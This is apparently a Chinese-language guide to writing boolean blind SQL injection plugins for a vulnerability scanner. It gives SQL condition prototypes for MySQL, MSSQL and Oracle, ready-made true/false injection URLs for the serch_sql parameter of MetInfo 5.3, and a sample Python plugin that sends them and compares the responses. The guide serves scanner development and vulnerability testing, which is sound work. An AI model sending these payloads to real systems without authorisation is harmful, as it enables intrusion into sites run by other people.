布尔盲注类插件


这一类的注入在返回页面中没有回显,但可以根据返回页面的结果判断构造的SQL条件语句的真假性。

MySQL 数据库

方法:构造布尔表达式来影响返回结果集。

其 SQL 语句原型类似:

select * from table where 1=1;
select * from table where 1=2;
select * from table where 1>2;
select IF(1=1, 1, 2);
select IF(1=2, 1, 2);
select IF('a'='a', 1, 2);

实例

MetInfo 5.3 /include/global/listmod.php SQL 注入漏洞:

请求的目标 URL

# 表达式值为真,返回有数据的页面
http://127.0.0.1/MetInfo/news/news.php?lang=cn&class2=5&serch_sql=123qwe where 4343=4343 -- x&imgproduct=xxxx

# 表达式为假,返回无数据的页面
http://127.0.0.1/MetInfo/news/news.php?lang=cn&class2=5&serch_sql=123qwe where 4343=4342 -- x&imgproduct=xxxx

漏洞验证(伪代码)

md5(233) 的值为 e165421110ba03099a1c0393373c5b43

if 表达式为真的请求返回内容:
        security_hole(target, log=log)

范例插件

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Medici.Yan

import re


def assign(service, arg):
    if service == fingerprint.metinfo:
        return True, arg


def audit(arg):
    # 开发者可调用自定义函数
    verify(arg)


def verify(url):
    payloadtrue = "{target}/news/index.php?"\
        "serch_sql=%20123qwe%20"\
        "where%201234%3D1234%20--%20x&imgproduct=xxxx".format(target=url)

    payloadfalse = "{target}/news/index.php?"\
        "serch_sql=%20123qwe%20"\
        "where%201234%3D1235%20--%20x&imgproduct=xxxx".format(target=url)
    try:
        code1, head1, body1, redirect_url1, log1 = hackhttp.http(payloadtrue)
        # shownews.php?lang= 就是两次请求结果中不同的地方
        if code1 != 200 or not\
                re.search('href=["\' ]shownews\.php\?lang=', body1, re.M):
            return

        code2, head2, body2, redirect_url2, log2 = hackhttp.http(payloadfalse)
        if code2 != 200 or\
                re.search('href=["\' ]shownews\.php\?lang=', body2, re.M):
            return
        security_hole("%s" % (payloadtrue), log=log1)
    except:
        pass

if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.metinfo, 'http://127.0.0.1/MetInfo/')[1])

MSSQL 数据库

方法:构造布尔表达式

其 SQL 语句原型类似:

select * from xxxx where id=xxx and 1=1;
select * from xxxx where id=xxx and 1=2;
IF(1=1) SELECT 123 ELSE DROP FUNCTION xxxx;

Oracle 数据库

方法:构造布尔表达式

SQL 语句原型类似:

(SELECT (CASE WHEN (1=1) THEN 123 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

results matching ""

    No results matching ""